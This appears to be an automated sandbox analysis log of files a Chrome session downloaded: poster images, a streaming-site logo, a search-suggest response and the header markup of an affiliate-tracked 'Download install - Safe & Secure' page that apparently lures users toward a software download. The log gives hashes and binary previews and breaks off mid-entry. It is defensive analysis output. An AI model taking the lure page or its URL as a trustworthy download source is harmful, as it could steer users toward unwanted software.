                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........4.....................................................................`/u..-.~..3.<...z3....l.X.(...5...^........5.L.x........Z6...F....5.......[...[\x...Q.f.?...-...8...."..O7W.J....h.C.0......A.Y1YF.(|..qB..V{b.mHQ.....|r.._,..e...._l.:..(>........_.h...3........@....l...'.T#..^......G......Z.f&..r.V_..0...p..}+.L.e....Br.z9..d....+.NJ.p>w..1.9.B!.:`.V...dq..H.=I.b_.....Wg..U..z..r...N.....K....)......c.6..'.F.s..m.....[.?.T..\...d.....g6..6..<..tV..^.9F.T..~...f.8.....2.l5.....!..N......0..,ba .".Sz(.).....n.....,i..SS:<.jA......-V.r.O..c8.B.+..........9K.l..H....\G..\ze.5..Q.>LD2...b.]..x@.9t...z...2d...$O.P&.XX....C.fo(.....Wj....j.-j...#IP.~...w.H...82v.J...a].NxA.l........r..T...SRV.".yb=..&..U..........{e=m^}s.4^.g......}."..a..=......%."/%.H.%.".o......R.H./.C.
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x454, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):36697
                                                                                                                                                                                          Entropy (8bit):7.982485269456573
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:v3nQ8oOWgZzNjvcyJG+6zSL/QCjMWPKwythUkuAII7ripJQvJAIv:v3JoSRjvcyQ+62jMWHytOAI+ipJCOIv
                                                                                                                                                                                          MD5:382A0CA57367958B9E4DAA8C99D6E3E9
                                                                                                                                                                                          SHA1:B2CDEDE458A4957EDB2C53BC7F48FAB11CECE2D0
                                                                                                                                                                                          SHA-256:5610C7DF871AE9EC2311AAA9D6BA3E2F2B69E0DAF23CB166934A7944F84D4AEA
                                                                                                                                                                                          SHA-512:70A15E9D4A63E22AF4FB169A12A75BEEC99E998FEFA888F45FB379D69A5598EF0EEE46FB248E96DE9ACD31A276041214941F8C4E0DFA6F1580D06796BD60BE93
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........6....................................................................dM7%....e?Ez....>,..=.......&2.+.oz..~u...g....7.S....{...$._z..yUnU.U.,O.4..&s....x.RT.B...5C}x.......)...M.....6E|]g..F.'.B".............4.....e8..k.5..v......."..[..:....kGN...TG..q...v>r..8.O.+....(..P.#.^. ...;...=Q.|.A.a.S....0>@.K..Yt....<....6F.....a.B...pQ.....:....[.u.mJ....K.....9.{0...d..o[[Vi#..*y#u..M.v+...)..N.g...P.. .q&....#tI..)...P..VftKB.2K...(.g......a.@.....bltR..../..N.....a.0l:..F...K.C..P....S.[...I'b.B..8..e....w..O.~H....'?...c..1.....$#.X2..%...\..`ns.%.}...9;...c..s.......W`................R.W`...L.y.d.*.j.s ..e..X5.0.s!G1.D.B...O..........d..G...:s..#s..H#Z...^Du..2z.....8..A.h.yw..."g...G&..xN.:.?>e.b....M...&..(...z#.h..\....G2......b.....T.....Sy...c.X..&..|.z....3..
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x450, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):26653
                                                                                                                                                                                          Entropy (8bit):7.976348042164098
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:nxbSu0h3iMaqLaTKP7tH29hpvo/FJFf0rPBjmdR3dg9pTl:lSucHLaTKJH29TvomrP0A9Fl
                                                                                                                                                                                          MD5:102DE3BE8BC3C6EF873BEA4014CC8D4C
                                                                                                                                                                                          SHA1:D10C9C6AC097BEDFF9094C5DC600CBD1B9E18B36
                                                                                                                                                                                          SHA-256:A372D7FEBA970A771FCB02614FE827B61BD14D47EA4C53295DA4CCDAAF8E7AB5
                                                                                                                                                                                          SHA-512:948099CB20FC81152100845C7C03725366128425B7BC56965408D122B50F39C256B4AACEA80A8078DB486E92FD1CAFCA2B9E03FCA6546A2806007BE92D39FCD5
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BNDA1ZDU3M2ItNTdmZC00NjlkLWJhN2UtYjY3YWI3Y2FhMThhXkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........4..................................................................u.irA..[V.X#....rV...1Ekv....IkD.6....a.QM..M.ic..Co0CfC...S..."...H!.-.R........i...F`....J...1.yK.<...Df.ic..........pQ*$..`...h..y.+.l../....Fb.b\T..Oc..Wrb...MgUn.c.svMs.....mkWsd...9e^i:;..1[..]-..L....r....p...\e...;W.).X:r.)/C.\^...,e..r...!.S..g..4.#P.sn."....:in.N))K..}x:....ql.ZH....I*A(.u....[z..Hu.R..$.J.y.....j..N.!..,M.ZL..e..N9vv.. ......R.f8D..)..e....g...ff.G...e..*...B.Hbjl.j.k...+.JX..#C$.9.N....=.T96.J...sr.j......Q..a..I..s..Sx.H..:m@..u..D..V..b..J.[..q.g.%.Q..f..%.W....f>.].l...*...r...3[@Vt#JQT$.+(..........R...Q.n.6.N. ........jH.#.J\g,..Ko..f.....k.B..I..y....dHE4...ku..;j.eW7....+....K!.iT...,~0.c1..r...K.:.f.$..3B.t...IfC.<.z#....F..k?.,vw8......_...]D..oG7.D....G2..9...{.3t.....J$.6.}...
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x429, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):27970
                                                                                                                                                                                          Entropy (8bit):7.971075242373812
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:7WZAFZob9G9mCW/YXXxb4JpAwb9gks77zDOn:7akWFC2Ynx2GwbSkuzDi
                                                                                                                                                                                          MD5:58FE422A74818F31163A7EB5D3C60C4A
                                                                                                                                                                                          SHA1:9096CDDB107A8C1D01A0E65CC144578EB1E04182
                                                                                                                                                                                          SHA-256:C94A17195ACB39710B2A86A4E230B4C474919B9D722B3C7749CA97BDC3D9ED9C
                                                                                                                                                                                          SHA-512:059BB53BB3D3F958F8CDA39F94D23BFC2E78BF15E5C8479553119F6F0FECE3BE2AA46762C0496A48566A4CDEBB5831AF8057A3A109C0D1BAAD2882818ED2DB21
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BMmRkMTVlNTEtOWQxNC00OGY4LWIzMzQtMjY2MTZjNDU2N2ViXkEyXkFqcGdeQXVyNjMwMjk0MTQ@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........6..................................................................]..../....n.m.D...s!..d.5)....#l.0dd..q..p......;....x..\.!z."IVVU................vW*......y....M.... ........G\r@u....Tq......).W.e).;Fb.7....l....x.}.....u......zE..T.(...r.)j6...^..7.......m..qq..~.s'(Bk...yf..g...|.w'.."u....;.[......6".&..szi.y.E...........kQ..m...Gz.#..J..=v.G$>'..........sF.r.~5....1kpw8}>8../m.....5..x?..],]{]..z....=...R.r.....9K.-.J."Ov.!.7.v4[hA=e....d.f>....n).y'.=/.oR.z..<.:.x..b..}.......Kh.{.t.6.X2..h.Db.....?E+j.D.U.:......4.;\...8......6......J..I...?n..I..].t..4...Z.f..T../G|.MF0...w.bM.*I9N..m.g,....~A.uiN...u.....V}D2.9H.I{....L.?7+..Y..l.C....8....Iz.py..[......J....n...R...bE.z...qs{...f.Y.K..]#C...9..w.%.z_7.rE.m....a..e.....XZ.s..c.c.M...n.aQ{.-....W>L........
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (342), with CRLF line terminators
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):3355
                                                                                                                                                                                          Entropy (8bit):4.936970263077565
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:tyc876A6z6r1xPZYfNMf0WZf4/I58V1VDIRzRYoZRuZoownoZwahi7CaEPp:AKxORxx8u0Wx4/TVlS/RSBhws
                                                                                                                                                                                          MD5:7BACD8F4982CFC24E6017073C8E05C84
                                                                                                                                                                                          SHA1:6A6456C9BDDE0CADA80F4019A9C3CCA6F6B26471
                                                                                                                                                                                          SHA-256:42534A866658916E71606DA9F939958156BCCE3A5FEC9C798350A581C0F79F41
                                                                                                                                                                                          SHA-512:8C0DB546629CD55C9CE29FA6508C812F23500144589CAA9F66DB70B02D5BDC87E8EC09D524BBF36DB684AA1F09AE5978FAC5BF615C5DC4F05CC7A3F0962DAED4
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://birthjeans.icu/?affId=2923&o=473&s1=WW_Opera_Inst_55CPA_201024_LP2&t=download_s1&title=install&click_id=6854923038828080143&source=1092278&s2=649654
                                                                                                                                                                                          Preview:<!DOCTYPE html>..<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. .. <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.. <meta http-equiv="x-ua-compatible" content="ie=edge">.... <title>Download install - Safe & Secure</title>.. <link rel="stylesheet" type="text/css" href="/templates/assets/s1/bootstrap.min.css">.. <link rel="stylesheet" type="text/css" href="/templates/assets/s1/fontawesome.css?">.. <link rel="stylesheet" type="text/css" href="/templates/assets/s1/style.css">......<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script>.. </head>...... <body>.. <div class="page_wrapper">.. <header class="site_header">.. <div class="container">.. <div class="row align-items-center">.. <div class="col-lg-8 col-6 d-flex align-items-center">.. <div class="site_logo">.... </div>.. <n
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (2846)
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):2851
                                                                                                                                                                                          Entropy (8bit):5.832378891506996
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:mSz2+KlgZ01nPcH6666oiknxMWl0BbHUl0t2n/cvMyL0nF0LwuSEqmfffffX:ms2VliJH6666/knxj0Hu0t2/cvMyOFqx
                                                                                                                                                                                          MD5:23DB600240F575B51519B4002FC3A1EB
                                                                                                                                                                                          SHA1:F4334B6A69D5DA72C2849C7AE8553A6CC29E66C9
                                                                                                                                                                                          SHA-256:A5F6EB68FFD99211C3D838B27AD7957EE28647615646A3E78DA98653AA23AB98
                                                                                                                                                                                          SHA-512:8D6D999E1F765DC9817AE19BBEB2A04208E58385C6F1A7CBD466EC4083E77334D2B336DFE6A152E0D88C61CF707E182D386D8211B3111AA9DDDCBB6B25A27664
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                          Preview:)]}'.["",["ruger rxm 9mm pistol","tennessee illinois basketball","ripple xrp news","peak design backpack","minnesota gophers hockey michigan state","2025 lego star wars advent calendar","great circle indiana jones","lifetime supercharging tesla"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"Cg0vZy8xMWtxcTUwM3JtEgpWaWRlbyBnYW1lMtcKZGF0YTppbWFnZS9qcGVnO2Jhc2U2NCwvOWovNEFBUVNrWkpSZ0FCQVFBQUFRQUJBQUQvMndDRUFBa0dCd2dIQmdrSUJ3Z0tDZ2tMRFJZUERRd01EUnNVRlJBV0lCMGlJaUFkSHg4a0tEUXNKQ1l4Sng4ZkxUMHRNVFUzT2pvNkl5cy9SRDg0UXpRNU9qY0JDZ29LRFF3TkdnOFBHamNsSHlVM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOLy9BQUJFSUFCUUFRQU1CSWdBQ0VRRURFUUgveEFBYkFBQURBUUFEQVFBQUFBQUFBQUFBQUFBQUJBWUNBd1VIQWYvRUFDNFFBQUlCQWdVQ0JRRUpBQUFBQUFBQUFBRUNBd1FSQUFVU0V5RUdNU
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):4334
                                                                                                                                                                                          Entropy (8bit):7.869787696459556
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:6m01MWIhj9aPKlPaL2mTHRqeln5s5j1utTn00v1tbxT3No:A1M7AK5aL2AB7sAI07d6
                                                                                                                                                                                          MD5:1F8D7A0F7D13BC20E76A00901400D071
                                                                                                                                                                                          SHA1:776B04C32352BFA34FD764A8975B16018E10348B
                                                                                                                                                                                          SHA-256:C4BA91AC2DB080CDDFCFC39EF8A900927093500558EC85F9EA6A6031C7BCD314
                                                                                                                                                                                          SHA-512:4893F8D7E2973E3FE7E513B981D9A35ECFD5E49C550EF170404E201BA39E05B4A7FECCF7B71E89E5950E36219DDDB8EDB443B2A3E355802E1DA1F8AF38526013
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://fsharetv.co/img/fsharetv.png
                                                                                                                                                                                          Preview:.PNG........IHDR..............X......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[l....G....jA/.R......*P.P..-q..+.ei.bA..P.^....E2U..W...EiB...p1D..B.R*B..)E.M...G.N......g...z..I.vw.e....9s...B.!..B.!..B.!..B.!..B.!..B.!..B.!..88R....#..IMs..eQ..!...I..~...M.l.ha9.>_....X.Hy.&.....M..Q.?r.7h..Y.H0..x.&q.c...4.t...a;..&.2G+..B...x.&.9HW.@_.$4..j..&.9...|.IjDs.....k....%....^.S....Q...r..Y.J^n..1.OH4.....]..F...f..o..8]#.cOB"A..s.N7..u#fu.R....w.lM..AH5.`.:...:....0"..:....mU#c...r-..).AH$......u./.B.p....5.........B"..E..oL.3..K..H.`.A....E..!$...-....;X.h.B..`.A....E..!$...-....;X.h.B..`.A....E..!$...-....;X.h.B..`.A....E..!$...-....;X.h.B..`.A....E..!$...-....;X.h.B..`.A....E..!$...-....;X.h.B..`.A....E..!$.....5....7e//.B".....fNy=X..W . $.;X..^D^.p...p-+.B"q.LEEo:.....%oL......B"q.L...!.....$c....E..H\...Z.`.....[ze|...P..Jn.,.'o....E..H. ..5.EoJ.... c.i?>g$M.P.X........j.5........*.......a.}VZE..NF.".v=.D..)...BjA...+x:]..wxC
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x400, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):27556
                                                                                                                                                                                          Entropy (8bit):7.964260456791798
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:CECzPG0DcRdQ7467a7lhOoSsDuqg5oUQc:Ctu09Xm7CsqqgiFc
                                                                                                                                                                                          MD5:A0378D7F05416DAAF0931676A145042C
                                                                                                                                                                                          SHA1:EB61196A948309D5B43561D930CBB7EA9A1C48FF
                                                                                                                                                                                          SHA-256:8852EACFB721FCE2A3E460A2005CE70C47995429F252D8F458EDDB4CAA8FD344
                                                                                                                                                                                          SHA-512:462448D47B97D7FAB2E9D816122544655F8A9606AC235319F152EB1530EEBA8E4C9969F9BC835EA8AEB539D2EE78D2E38B361EF83F4E23B54B89F12629826F4E
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BMTQ2Nzc1MDQzOF5BMl5BanBnXkFtZTgwMDgzMTA5MzE@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........4..................................................................Mn......LuB..J.\T..8QB.Qz...*U%:.uN-(....F..8F.$....bSd.I..Mq..Z..p*.....PVOc.\5......4.".#...W\..A...H..5F@.|..9f.....X...........".<..&.O........I,)..B.*X..x..S........!...........<...#..U..AN..2...A.z.z^0OF.$.S|.p<.z...f@.........@..@....p...f........&F..>|#q\.^..1.<.X....L..m.{.m`.......!.........y.U...=..z......9....$..@....=..em.)...V$*...h../5...0..... n..........L.G;0....e../.1m......tR.5...OGfZFtc;...s......<..........@.!..t.......x..+.....'.n.X0.:....dOL....|....M.C......?X..}...%..-.w..p.....z8...F.O.:@...`....v*.....;%.....-U.j...Hz#..',7Z...%...E.n....Z..'I.*.H...W.W.....Q..^...Y..BIv...4q...o3...6.!bo....X.d.A3.).8.-Z.h.JC.x+..+dj..%.0...<^...6.._k.K%q.=K"...T...2.Uu~..0.Q_?...f,.R7....cS.v-Q.j..N...6.lK
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x435, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):22247
                                                                                                                                                                                          Entropy (8bit):7.976250045230036
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:h2qTjhTnrDbxWwzbiZW7G4rashdtCY0hnJ/YZP+fTYDTDQojgFX8dNZkZ4/odkLW:9tDbXMwashdEYAJAZPlDfQLFsdNZ+4lW
                                                                                                                                                                                          MD5:562A88D7BC4A73DB9497CE66D656A0B3
                                                                                                                                                                                          SHA1:C18CEF6F377EE84902B563353138ED10796BFB87
                                                                                                                                                                                          SHA-256:54745E1F286A7DB96CDF205EBFCB57A4FE39E7D29E74745D1DA39105026D1AB3
                                                                                                                                                                                          SHA-512:863DA0A9B99533EF2413ACDF9F7199CD817631ACF3C885426EEC8331B6FB7B8DD0E79A3A2F5F0920404267F62C565868751C94AAF144695B04991DAF5F9C78E1
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BODA3YWQwODktZDJhOC00YTMwLTgyMzUtYzFhZWI4MGYyYjQ0XkEyXkFqcGdeQXVyNTA4NzExMDg@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5..................................................................I.....#I.@|H...GT..X..)X4...l....bV-..+..yL....V$..AF.j,'E.Vl..=.u.&.......G..m..I{.mm.68.2.)i.QC0.OWY......9..]..x.u..2t.;6..NbV..O..:..<..h^.R...<....e..]..Nf.7..3.\w.&..(I..BLU.UB7....Mw..&....u.......Y..V.)o..Im.%.).w..n...S..]M..^.5.....%..-rb.[..e.....O.;..D...6FB.......nu..By...t.q.,}.....;'J.J.T..k...V.;.....>.Y..:....C.SQ+&.D./...K...F...m.c(.l&...{...u..zN.j..0....?.../C.....J.z.;fkI..!X...1._.V..JCb%.\..E;..E.B.*.f.\..R?".I..{....`.']7..cx..cVOy....R.mv.....u....Mr.).JJ..I.........:....6..5{/?.X&....nq0..........L]....*.=.J......K.$.1UX.mI$!....D~i.8.....\.3.J..2x.RqT.+...#.Y..\-P&..F.......;]^.|.+......$..._.......\.n...$.}.duV....M..k..E+6.CN....cz...jon....#..._..n....#..5OF...zg..-L.^.
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x421, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):50325
                                                                                                                                                                                          Entropy (8bit):7.988658539069268
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:+2Y8C4QrKoF6bbowZymCizITtKEGIVbw0UTW:pY8NQGHbbH8mbIW6U0GW
                                                                                                                                                                                          MD5:03670FC66FCA0FA087FCC6E6A37FC0A3
                                                                                                                                                                                          SHA1:9D704B6561300459A1F43ED719F710FCD00B8771
                                                                                                                                                                                          SHA-256:BC69D58F4A170D80A08C581BDFCA23EFBC02834AC86AF9ABD08CC54680A73E1D
                                                                                                                                                                                          SHA-512:A0D8252C51838F7A59345C454433EA5075457138614E1A3AC2F550F32BAFA32BD6394D874FED8661814EECA27CFA407A9A5BDEDA359480C27A3D2EE2085A163C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BNWYxZjE3MGQtZWZmMC00NTFjLTlkZmUtODFkZDY1MGYyZWQ4XkEyXkFqcGdeQXVyNjM2NTM3ODA@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5..................................................................\-........=..d..6.i.}.~f.QFF......\...Z...)...V......./..}}KI...a..j..d.lH``nKd.."G......cs.....Y...>...>..YZ:...$.n..FS4..\].M..J.s.....!5..G.c.m.k.....@...m....i.][LP.)...0N....~....*............!.....er..'..R.".4].J/.......i.$.~......7)..\R..%...C......x...WAvn.u.F _.."4e..&.gK.M7.).{sH...^r.....I=}.......R..S.v....H..7.R~....J:..R.A.7...w.m.>..@..~...c+s.{..X.....m~..G}.}.....f|..f..d...Y.".^,.C..e.df...;:..B?:.'.t....$.N....>..3.....y..^ ..cWK.#g.a....@.(}...@j..remG.fo.F..MT.b5...........#eb.6....=...j..;.egI.y+`..7!*.+HB...mJ....h.L7;....em.u.......{X~.Lm..\>.s..\}J.\....X...#...v.D5&q.....=x..6.)).Vy...c.1...ZL1*....%h.Y....-*z?.u..K`...&..~hM..m.jU..~W.~Y.[..92>Fg.Am.!..|.n<..f...3.M...h.2.
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):9
                                                                                                                                                                                          Entropy (8bit):2.94770277922009
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:Obn:Obn
                                                                                                                                                                                          MD5:9D1EAD73E678FA2F51A70A933B0BF017
                                                                                                                                                                                          SHA1:D205CBD6783332A212C5AE92D73C77178C2D2F28
                                                                                                                                                                                          SHA-256:0019DFC4B32D63C1392AA264AED2253C1E0C2FB09216F8E2CC269BBFB8BB49B5
                                                                                                                                                                                          SHA-512:935B3D516E996F6D25948BA8A54C1B7F70F7F0E3F517E36481FDF0196C2C5CFC2841F86E891F3DF9517746B7FB605DB47CDDED1B8FF78D9482DDAA621DB43A34
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BN2FmNGYzMGQtZDI1MS00NTIwLWE4MzUtMzJlNDA5ZjRiMzhkXkEyXkFqcGdeQXVyNTUyMzE4Mzg@._V1_SX300.jpg
                                                                                                                                                                                          Preview:Not Found
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x430, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):29684
                                                                                                                                                                                          Entropy (8bit):7.972512887085643
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:NfdOZamC2bIB++8FxcyA7xtJI2sxHm2umiwoxTd:tdZabI8VFmd7xA3LibR
                                                                                                                                                                                          MD5:A73353C3E661EF6383D61F416DE01883
                                                                                                                                                                                          SHA1:098335A76128AC06CFFB432F351D377221C7CD76
                                                                                                                                                                                          SHA-256:4CA6FEB429BEBA2F2A4AA351760CAC03CAB4C8F24B8070EACF084F9CC21979B1
                                                                                                                                                                                          SHA-512:E65022508D38DFCA66253F06551813FDDE0D2E2617ACF62B7197D6DB29291AD6632D51F81B3454C2AEBE469EDAC5B1EE33492EA400BAD2EBB77BA7278D108B31
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........4...................................................................Z...}.k.6.--y;...s..#...A#...1it.l.......6.......kT.......Nt.N....$sd..j.!4..N..[#Y.....S.^_p^g..oU....O..........K.q..*.G..#..\..1...y..\..HY......}.....Zg.U4.o..i..a~!9..$]2pQ/....l...D..o.2..u....Z.}j...Z:f......t9T.K.....7o..*S;n.c....+.*....a.L.{'L.9.bb........Y.t..%.^.n5...?..3.<........-....r.D..m...]X......J.]".i....S...u6.....'......8.....G..|..f....G...(.kP...D..v.....x...c..Y.....^....?}.....U.X..<...+jty.....mY..R5...=|U..;.|..X....2......G..4.....mU.3..S.....g.q._(..^.O.sM.....=...^.(.9.A....>..^..V./I.SN.....d.^'..y.@.....W..a......z..'vr....h...\....z.....c.a4.J.n......G....y..f.a...@.u..;>.. j..99.^mJ2.c..F..AY..x4G2|.....ar.B;E...w........|?..'.......:L./..g...-...W~q=u..d D._..1...
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x450, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):28244
                                                                                                                                                                                          Entropy (8bit):7.979520991201423
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:Tenz2IpzbF+PPL5xRMZrBnPte2VZU0Cas:TO2IO75xRMZVPQ2VZU0Cas
                                                                                                                                                                                          MD5:F9146A3A7D4B8AD0B94455BE4CD581D6
                                                                                                                                                                                          SHA1:C74606D71B520E63500BC9BA29814324D183CD73
                                                                                                                                                                                          SHA-256:653134BFCF8BA882E20FE6FE6B91D170EEA5C34B263487A926EF7110481953D5
                                                                                                                                                                                          SHA-512:0C38E4539034B9A904977A74B125D19B85C1C5AC52CEF2ED2473EE63D5498D07C1A2763D1D66D73FC32FBDA1FCD11C603B3CF661E9D41FCDF7342802EDD0B3F2
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5..................................................................^..:..}V..}./Z.....I..w..w..s..>U.e-)...I..2f...s....U{.:......je.:S..............#M....W.e....L{.M9w..N\.....M..%7..-.8......._..8.7..r.=.Ur.O2T..0%C.q....Y..9.)!i..o1m..U..2...V.bn......8....an/".#.1..;.Lu.2.66<=Gai..........*p...W..Y.....P....0*f..}..j.>.2...4.18....?tE...B....R...3.lnk...Z...............v.D..b.u... ]....p......*@.1dK.. ..J[[.2.....\.(;.Rr....+..}...6..ld..n<.6.....X..^B.((..fI.y.K.87I.!.0.f*..(9..oR8.. U...U.]iQ.:......=.$F..[:...{/..:<.s.,#.z q..33..c1d..V?{.x....Z...\,q.C.l../=..r.4zo...E.u{\...cQ..l.=.[.2d@.e.F....ICtY]B.[..1!...w....|.yp.l=.?LT"Q_..m.d..i..|.Z..M..@.I....@..0\.%U,....C.Ft;.y1^}L......<.]Lt........v..\..7..q..F...&.../..-..V;......q}4t.P{..1.V...R.....DkKI....3.=....
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (2310)
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):218046
                                                                                                                                                                                          Entropy (8bit):5.536261353889152
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:ISFitgcnsmIjh+D0izmYasxzuZ1IwPcRCrhaPhka0Mf3/MVpm9VM1:fYnsmQtZ1HcRCrva0Mf3/MVr
                                                                                                                                                                                          MD5:02907682715C56361FC912830A305863
                                                                                                                                                                                          SHA1:149CB851382AB7C3068E9A9FC855896F8347E128
